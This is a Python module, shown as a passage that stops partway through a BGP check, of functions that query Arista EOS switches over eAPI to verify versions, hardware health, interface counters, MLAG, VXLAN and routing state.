] | 10 | 2022-02-10T11:31:49.000Z | 2022-03-03T16:31:49.000Z | tests_eos/functions.py | arista-netdevops-community/network_tests_automation | feb216799e427cde82bd7594d2276e0e6ef5f9b1 | [
"Apache-2.0"
] | 3 | 2022-02-08T07:58:35.000Z | 2022-03-28T20:36:49.000Z | """
Module that defines various functions to test EOS devices.
"""
from jsonrpclib import jsonrpc
def verify_eos_version(device, enable_password, versions = None):
"""
Verifies the device is running one of the allowed EOS version.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
versions (list): List of allowed EOS versions.
Returns:
bool: `True` if the device is running an allowed EOS version.
`False` otherwise.
"""
if not versions:
return None
try:
response = device.runCmds(1, ['show version'], 'json')
except jsonrpc.AppError:
return None
try:
if response[0]['version'] in versions:
return True
return False
except KeyError:
return None
def verify_terminattr_version(device, enable_password, versions = None):
"""
Verifies the device is running one of the allowed TerminAttr version.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
versions (list): List of allowed TerminAttr versions.
Returns:
bool: `True` if the device is running an allowed TerminAttr version. `False` otherwise.
"""
if not versions:
return None
try:
response = device.runCmds(1, ['show version detail'], 'json')
except jsonrpc.AppError:
return None
try:
if response[0]['details']['packages']['TerminAttr-core']['version'] in versions:
return True
return False
except KeyError:
return None
def verify_eos_extensions(device, enable_password):
"""
Verifies all EOS extensions installed on the device are enabled for boot persistence.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if the device has all installed its EOS extensions enabled for boot persistence.
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show extensions', 'show boot-extensions'], 'json')
except jsonrpc.AppError:
return None
installed_extensions = []
boot_extensions = []
try:
for extension in response[0]['extensions']:
if response[0]['extensions'][extension]['status'] == 'installed':
installed_extensions.append(extension)
for extension in response[1]['extensions']:
extension = extension.strip('\n')
if extension == '':
pass
else:
boot_extensions.append(extension)
installed_extensions.sort()
boot_extensions.sort()
if installed_extensions == boot_extensions:
return True
return False
except KeyError:
return None
def verify_field_notice_44_resolution(device, enable_password):
"""
Verifies the device is using an Aboot version that fix the bug discussed
in the field notice 44 (Aboot manages system settings prior to EOS initialization).
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if the device is using an Aboot version that fix the bug discussed
in the field notice 44 or if the device model is not affected.
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show version detail'], 'json')
except jsonrpc.AppError:
return None
devices = ['DCS-7010T-48',
'DCS-7010T-48-DC',
'DCS-7050TX-48',
'DCS-7050TX-64',
'DCS-7050TX-72',
'DCS-7050TX-72Q',
'DCS-7050TX-96',
'DCS-7050TX2-128',
'DCS-7050SX-64',
'DCS-7050SX-72',
'DCS-7050SX-72Q',
'DCS-7050SX2-72Q',
'DCS-7050SX-96',
'DCS-7050SX2-128',
'DCS-7050QX-32S',
'DCS-7050QX2-32S',
'DCS-7050SX3-48YC12',
'DCS-7050CX3-32S',
'DCS-7060CX-32S',
'DCS-7060CX2-32S',
'DCS-7060SX2-48YC6',
'DCS-7160-48YC6',
'DCS-7160-48TC6',
'DCS-7160-32CQ',
'DCS-7280SE-64',
'DCS-7280SE-68',
'DCS-7280SE-72',
'DCS-7150SC-24-CLD',
'DCS-7150SC-64-CLD',
'DCS-7020TR-48',
'DCS-7020TRA-48',
'DCS-7020SR-24C2',
'DCS-7020SRG-24C2',
'DCS-7280TR-48C6',
'DCS-7280TRA-48C6',
'DCS-7280SR-48C6',
'DCS-7280SRA-48C6',
'DCS-7280SRAM-48C6',
'DCS-7280SR2K-48C6-M',
'DCS-7280SR2-48YC6',
'DCS-7280SR2A-48YC6',
'DCS-7280SRM-40CX2',
'DCS-7280QR-C36',
'DCS-7280QRA-C36S']
variants = ['-SSD-F',
'-SSD-R',
'-M-F',
'-M-R',
'-F',
'-R']
try:
model = response[0]['modelName']
for variant in variants:
model = model.replace(variant, '')
if model not in devices:
return True
for component in response[0]['details']['components']:
if component['name'] == 'Aboot':
aboot_version = component['version'].split('-')[2]
if aboot_version.startswith('4.0.') and int(aboot_version.split('.')[2]) < 7:
return False
if aboot_version.startswith('4.1.') and int(aboot_version.split('.')[2]) < 1:
return False
if aboot_version.startswith('6.0.') and int(aboot_version.split('.')[2]) < 9:
return False
if aboot_version.startswith('6.1.') and int(aboot_version.split('.')[2]) < 7:
return False
return True
except KeyError:
return None
def verify_uptime(device, enable_password, minimum = None):
"""
Verifies the device uptime is higher than a value.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
minimum (int): Minimum uptime in seconds.
Returns:
bool: `True` if the device uptime is higher than the threshold.
`False` otherwise.
"""
if not minimum:
return None
try:
response = device.runCmds(1, ['show uptime'], 'json')
except jsonrpc.AppError:
return None
try:
if response[0]['upTime'] > minimum:
return True
return False
except KeyError:
return None
def verify_reload_cause(device, enable_password):
"""
Verifies the last reload of the device was requested by a user.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if the device last reload was requested by a user.
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show version','show reload cause'], 'json')
except jsonrpc.AppError:
return None
try:
if response[0]['resetCauses'][0]['description'] == 'Reload requested by the user.':
return True
return False
except KeyError:
return None
def verify_coredump(device, enable_password):
"""
Verifies there is no core file.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if the device has no core file. `False` otherwise.
"""
try:
response = device.runCmds(1, \
[{"cmd": "enable", "input": enable_password},'bash timeout 10 ls /var/core'], 'text')
except jsonrpc.AppError:
return None
try:
if len(response[1]['output']) == 0:
return True
return False
except KeyError:
return None
def verify_agent_logs(device, enable_password):
"""
Verifies there is no agent crash reported on the device.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if the device has no agent crash reported.
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show agent logs crash'], 'text')
except jsonrpc.AppError:
return None
try:
if len(response[0]['output']) == 0:
return True
return False
except KeyError:
return None
def verify_syslog(device, enable_password):
"""
Verifies the device had no syslog message with a severity of warning (or a more severe message)
during the last 7 days.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if the device had no syslog message with a severity of warning (or a more severe message)
during the last 7 days.
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show logging last 7 days threshold warnings'], 'text')
except jsonrpc.AppError:
return None
try:
if len(response[0]['output']) == 0:
return True
return False
except KeyError:
return None
def verify_cpu_utilization(device, enable_password):
"""
Verifies the CPU utilization is less than 75%.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if the device CPU utilization is less than 75%.
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show processes top once'], 'json')
except jsonrpc.AppError:
return None
try:
if response[0]['cpuInfo']['%Cpu(s)']['idle'] > 25:
return True
return False
except KeyError:
return None
def verify_memory_utilization(device, enable_password):
"""
Verifies the memory utilization is less than 75%.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if the device memory utilization is less than 75%.
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show version'], 'json')
except jsonrpc.AppError:
return None
try:
if float(response[0]['memFree']) / float(response[0]['memTotal']) > 0.25:
return True
return False
except KeyError:
return None
def verify_filesystem_utilization(device, enable_password):
"""
Verifies each partition on the disk is used less than 75%.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if each partition on the disk is used less than 75%.
`False` otherwise.
"""
try:
response = device.runCmds(1, \
[{"cmd": "enable", "input": enable_password},'bash timeout 10 df -h'], 'text')
except jsonrpc.AppError:
return None
try:
for line in response[1]['output'].split('\n')[1:]:
if 'loop' not in line and len(line) > 0:
if int(line.split()[4].replace('%', '')) > 75:
return False
return True
except KeyError:
return None
def verify_transceivers_manufacturers(device, enable_password, manufacturers = None):
"""
Verifies the device is only using transceivers from supported manufacturers.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
manufacturers (list): List of allowed transceivers manufacturers.
Returns:
bool: `True` if the device is only using transceivers from supported manufacturers.
`False` otherwise.
"""
if not manufacturers:
return None
try:
response = device.runCmds(1, ['show inventory'], 'json')
except jsonrpc.AppError:
return None
try:
for interface in response[0]['xcvrSlots']:
if response[0]['xcvrSlots'][interface]['mfgName'] not in manufacturers:
return False
return True
except KeyError:
return None
def verify_system_temperature(device, enable_password):
"""
Verifies the device temperature is currently OK
and the device did not report any temperature alarm in the past.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if the device temperature is OK.
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show system environment temperature'], 'json')
except jsonrpc.AppError:
return None
try:
if response[0]['systemStatus'] != 'temperatureOk':
return False
return True
except KeyError:
return None
def verify_transceiver_temperature(device, enable_password):
"""
Verifies the transceivers temperature is currently OK
and the device did not report any alarm in the past for its transceivers temperature.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if the transceivers temperature of the device is currently OK
and if the device did not report any alarm in the past for its transceivers temperature.
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show system environment temperature transceiver'], 'json')
except jsonrpc.AppError:
return None
try:
for sensor in response[0]['tempSensors']:
if sensor['hwStatus'] != 'ok' or sensor['alertCount'] != 0:
return False
return True
except KeyError:
return None
def verify_environment_cooling(device, enable_password):
"""
Verifies the fans status is OK.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if the if the fans status is OK.
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show system environment cooling'], 'json')
except jsonrpc.AppError:
return None
try:
if response[0]['systemStatus'] != 'coolingOk':
return False
return True
except KeyError:
return None
def verify_environment_power(device, enable_password):
"""
Verifies the power supplies status is OK.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if the power supplies is OK.
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show system environment power'], 'json')
except jsonrpc.AppError:
return None
try:
for powersupply in response[0]['powerSupplies']:
if response[0]['powerSupplies'][powersupply]['state'] != 'ok':
return False
return True
except KeyError:
return None
def verify_zerotouch(device, enable_password):
"""
Verifies ZeroTouch is disabled.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if ZeroTouch is disabled.
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show zerotouch'], 'json')
except jsonrpc.AppError:
return None
try:
if response[0]['mode'] == 'disabled':
return True
return False
except KeyError:
return None
def verify_running_config_diffs(device, enable_password):
"""
Verifies there is no difference between the running-config and the startup-config.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if there is no difference between the running-config and the startup-config.
`False` otherwise.
"""
try:
response = device.runCmds(1, \
[{"cmd": "enable", "input": enable_password},'show running-config diffs'], 'text')
except jsonrpc.AppError:
return None
try:
if len(response[1]['output']) == 0:
return True
return False
except KeyError:
return None
def verify_unified_forwarding_table_mode(device, enable_password, mode = None):
"""
Verifies the device is using the expected Unified Forwarding Table mode.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
mode (int): The expected Unified Forwarding Table mode.
Returns:
bool: `True` if the device is using the expected Unified Forwarding Table mode.
`False` otherwise.
"""
if not mode:
return None
try:
response = device.runCmds(1, ['show platform trident forwarding-table partition'], 'json')
except jsonrpc.AppError:
return None
try:
if response[0]['uftMode'] == str(mode):
return True
return False
except KeyError:
return None
def verify_tcam_profile(device, enable_password, profile):
"""
Verifies the configured TCAM profile is the expected one.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
profile (str): The expected TCAM profile.
Returns:
bool: `True` if the device is configured with the expected TCAM profile.
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show hardware tcam profile'], 'json')
except jsonrpc.AppError:
return None
try:
if (response[0]['pmfProfiles']['FixedSystem']['status'] == response[0]['pmfProfiles']['FixedSystem']['config'])\
and (response[0]['pmfProfiles']['FixedSystem']['status'] == profile):
return True
return False
except KeyError:
return None
def verify_adverse_drops(device, enable_password):
"""
Verifies there is no adverse drops on DCS-7280E and DCS-7500E switches.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if the device (DCS-7280E and DCS-7500E) doesnt reports adverse drops.
`False` if the device (DCS-7280E and DCS-7500E) report adverse drops.
"""
try:
response = device.runCmds(1, ['show hardware counter drop'], 'json')
except jsonrpc.AppError:
return None
try:
if response[0]['totalAdverseDrops'] == 0:
return True
return False
except KeyError:
return None
def verify_ntp(device, enable_password):
"""
Verifies NTP is synchronised.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if the NTP is synchronised. `False` otherwise.
"""
try:
response = device.runCmds(1, ['show ntp status'], 'text')
except jsonrpc.AppError:
return None
try:
if response[0]['output'].split('\n')[0].split(' ')[0] == 'synchronised':
return True
return False
except KeyError:
return None
def verify_interface_utilization(device, enable_password):
"""
Verifies interfaces utilization is below 75%.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if interfaces utilization is below 75%. `False` otherwise.
"""
try:
response = device.runCmds(1, ['show interfaces counters rates'], 'text')
except jsonrpc.AppError:
return None
try:
for line in response[0]['output'].split('\n')[1:]:
if len(line) > 0:
if line.split()[-5] == '-' or line.split()[-2] == '-':
pass
elif float(line.split()[-5].replace('%', '')) > 75.0:
return False
elif float(line.split()[-2].replace('%', '')) > 75.0:
return False
return True
except KeyError:
return None
def verify_interface_errors(device, enable_password):
"""
Verifies interfaces error counters are equal to zero.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if the interfaces error counters are equal to zero.
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show interfaces counters errors'], 'json')
except jsonrpc.AppError:
return None
try:
for interface in response[0]['interfaceErrorCounters']:
for counter in response[0]['interfaceErrorCounters'][interface]:
if response[0]['interfaceErrorCounters'][interface][counter] != 0:
return False
return True
except KeyError:
return None
def verify_interface_discards(device, enable_password):
"""
Verifies interfaces packet discard counters are equal to zero.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if the interfaces packet discard counters are equal to zero.
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show interfaces counters discards'], 'json')
except jsonrpc.AppError:
return None
try:
for interface in response[0]['interfaces']:
for counter in response[0]['interfaces'][interface]:
if response[0]['interfaces'][interface][counter] != 0:
return False
return True
except KeyError:
return None
def verify_interface_errdisabled(device, enable_password):
"""
Verifies there is no interface in error disable state.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if there is no interface in error disable state..
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show interfaces status'], 'json')
except jsonrpc.AppError:
return None
try:
for interface in response[0]['interfaceStatuses']:
if response[0]['interfaceStatuses'][interface]['linkStatus'] == 'errdisabled':
return False
return True
except KeyError:
return None
def verify_interfaces_status(device, enable_password, minimum = None):
"""
Verifies the number of Ethernet interfaces up/up on the device is higher or equal than a value.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
minimum (int): Expected minimum number of Ethernet interfaces up/up
Returns:
bool: `True` if the number of Ethernet interfaces up/up on the device is higher or equal
than the provided value.
`False` otherwise.
"""
if not minimum:
return None
try:
response = device.runCmds(1, ['show interfaces description'], 'json')
except jsonrpc.AppError:
return None
nbr = 0
try:
for item in response[0]['interfaceDescriptions']:
if ('Ethernet' in item) \
and (response[0]['interfaceDescriptions'][item]['lineProtocolStatus'] == 'up')\
and (response[0]['interfaceDescriptions'][item]['interfaceStatus'] == 'up'):
nbr = nbr + 1
if nbr >= minimum:
return True
return False
except KeyError:
return None
def verify_storm_control_drops(device, enable_password):
"""
Verifies the device did not drop packets due its to storm-control configuration.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if the device did not drop packet due to its storm-control configuration.
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show storm-control'], 'json')
except jsonrpc.AppError:
return None
try:
for interface in response[0]['interfaces']:
for traffic_type in ['all', 'unknown-unicast', 'multicast', 'broadcast']:
if traffic_type in response[0]['interfaces'][interface]["trafficTypes"]:
if 'drop' in response[0]['interfaces'][interface]["trafficTypes"][traffic_type] \
and response[0]['interfaces'][interface]["trafficTypes"][traffic_type]['drop'] != 0:
return False
return True
except KeyError:
return None
def verify_portchannels(device, enable_password):
"""
Verifies there is no inactive port in port channels.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if there is no inactive port in port channels.
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show port-channel'], 'json')
except jsonrpc.AppError:
return None
try:
if len(response[0]['portChannels']) == 0:
return None
for portchannel in response[0]['portChannels']:
if len(response[0]['portChannels'][portchannel]['inactivePorts']) != 0:
return False
return True
except KeyError:
return None
def verify_illegal_lacp(device, enable_password):
"""
Verifies there is no illegal LACP packets received.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if there is no illegal LACP packets received.
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show lacp counters all-ports'], 'json')
except jsonrpc.AppError:
return None
try:
if len(response[0]['portChannels']) == 0:
return None
for portchannel in response[0]['portChannels']:
for interface in response[0]['portChannels'][portchannel]['interfaces']:
if response[0]['portChannels'][portchannel]['interfaces'][interface]['illegalRxCount'] != 0:
return False
return True
except KeyError:
return None
def verify_mlag_status(device, enable_password):
"""
Verifies the MLAG status:
state is active, negotiation status is connected, local int is up, peer link is up.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if the MLAG status is OK.
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show mlag'], 'json')
except jsonrpc.AppError:
return None
try:
if response[0]['state'] == 'disabled':
return None
if response[0]['state'] != 'active':
return False
if response[0]['negStatus'] != 'connected':
return False
if response[0]['localIntfStatus'] != 'up':
return False
if response[0]['peerLinkStatus'] != 'up':
return False
return True
except KeyError:
return None
def verify_mlag_interfaces(device, enable_password):
"""
Verifies there is no inactive or active-partial MLAG interfaces.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if there is no inactive or active-partial MLAG interfaces.
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show mlag'], 'json')
except jsonrpc.AppError:
return None
try:
if response[0]['state'] == 'disabled':
return None
if response[0]['mlagPorts']['Inactive'] != 0:
return False
if response[0]['mlagPorts']['Active-partial'] != 0:
return False
return True
except KeyError:
return None
def verify_mlag_config_sanity(device, enable_password):
"""
Verifies there is no MLAG config-sanity warnings.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if there is no MLAG config-sanity warnings.
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show mlag config-sanity'],'json')
except jsonrpc.AppError:
return None
try:
if response[0]['response']['mlagActive'] is False:
# MLAG isn't running
return None
if len(response[0]['response']['globalConfiguration']) > 0 or \
len(response[0]['response']['interfaceConfiguration']) > 0:
return False
return True
except KeyError:
return None
def verify_loopback_count(device, enable_password, number = None):
"""
Verifies the number of loopback interfaces on the device is the one we expect.
And if none of the loopback is down.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
number (int): Expected number of loopback interfaces.
Returns:
bool: `True` if the device is running an allowed EOS version.
`False` otherwise.
"""
if not number:
return None
try:
response = device.runCmds(1, ['show ip interface brief | include Loopback'], 'text')
except jsonrpc.AppError:
return None
try:
if (response[0]['output'].count('\n') == number) and (response[0]['output'].count('down') == 0) :
return True
return False
except KeyError:
return None
def verify_vxlan(device, enable_password):
"""
Verifies the interface vxlan 1 status is up/up.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if the interface vxlan 1 status is up/up.
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show interfaces description | include Vx1'], 'text')
except jsonrpc.AppError:
return None
try:
if response[0]['output'].count('up') == 2:
return True
return False
except KeyError:
return None
def verify_vxlan_config_sanity(device, enable_password):
"""
Verifies there is no VXLAN config-sanity warnings.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if there is no VXLAN config-sanity warnings.
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show vxlan config-sanity'], 'json')
except jsonrpc.AppError:
return None
try:
if len(response[0]['categories']) == 0:
return None
for category in response[0]['categories']:
if category in ['localVtep', 'mlag']:
if response[0]['categories'][category]['allCheckPass'] is not True:
return False
return True
except KeyError:
return None
def verify_svi(device, enable_password):
"""
Verifies there is no interface vlan down.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if there is no interface vlan down. `False` otherwise.
"""
try:
response = device.runCmds(1, ['show ip interface brief | include Vl'], 'text')
except jsonrpc.AppError:
return None
try:
if response[0]['output'].count('down') == 0:
return True
return False
except KeyError:
return None
def verify_spanning_tree_blocked_ports(device, enable_password):
"""
Verifies there is no spanning-tree blocked ports.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` there is no spanning-tree blocked ports.
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show spanning-tree blockedports'], 'json')
except jsonrpc.AppError:
return None
try:
if len(response[0]['spanningTreeInstances']) == 0:
return True
return False
except KeyError:
return None
def verify_routing_protocol_model(device, enable_password, model = None):
"""
Verifies the configured routing protocol model is the one we expect.
And if there is no mismatch between the configured and operating routing protocol model.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
model(str): Expected routing protocol model (multi-agent or ribd).
Returns:
bool: `True` if the configured routing protocol model is the one we expect.
And if there is no mismatch between the configured and operating routing protocol model.
`False` otherwise.
"""
if not model:
return None
try:
response = device.runCmds(1, [{'cmd': 'show ip route summary', 'revision': 3}], 'json')
except jsonrpc.AppError:
return None
try:
if (response[0]['protoModelStatus']['configuredProtoModel'] == response[0]['protoModelStatus']['operatingProtoModel']) \
and (response[0]['protoModelStatus']['operatingProtoModel'] == model):
return True
return False
except KeyError:
return None
def verify_routing_table_size(device, enable_password, minimum = None, maximum = None):
"""
Verifies the size of the IP routing table (default VRF).
Should be between the two provided thresholds.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
minimum(int): Expected minimum routing table (default VRF) size.
maximum(int): Expected maximum routing table (default VRF) size.
Returns:
bool: `True` if the size of the IP routing table (default VRF) is between two thresholds.
`False` otherwise.
"""
if not minimum or not maximum:
return None
try:
response = device.runCmds(1, [{'cmd': 'show ip route summary', 'revision': 3}], 'json')
except jsonrpc.AppError:
return None
try:
if (response[0]['vrfs']['default']['totalRoutes'] >= minimum) \
and (response[0]['vrfs']['default']['totalRoutes'] <= maximum):
return True
return False
except KeyError:
return None
def verify_bfd(device, enable_password):
"""
Verifies there is no BFD peer in down state (all VRF, IPv4 neighbors).
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if there is no BFD peer in down state (all VRF, IPv4 neighbors, single-hop).
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show bfd peers'], 'json')
except jsonrpc.AppError:
return None
try:
for vrf in response[0]['vrfs']:
for neighbor in response[0]['vrfs'][vrf]['ipv4Neighbors']:
for interface in response[0]['vrfs'][vrf]['ipv4Neighbors'][neighbor]['peerStats']:
if response[0]['vrfs'][vrf]['ipv4Neighbors'][neighbor]['peerStats'][interface]['status'] != 'up':
return False
return True
except KeyError:
return None
def verify_bgp_ipv4_unicast_state(device, enable_password):
"""
Verifies all IPv4 unicast BGP sessions are established (for all VRF)
and all BGP messages queues for these sessions are empty (for all VRF).
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if all IPv4 unicast BGP sessions are established (for all VRF)
and all BGP messages queues for these sessions are empty (for all VRF).
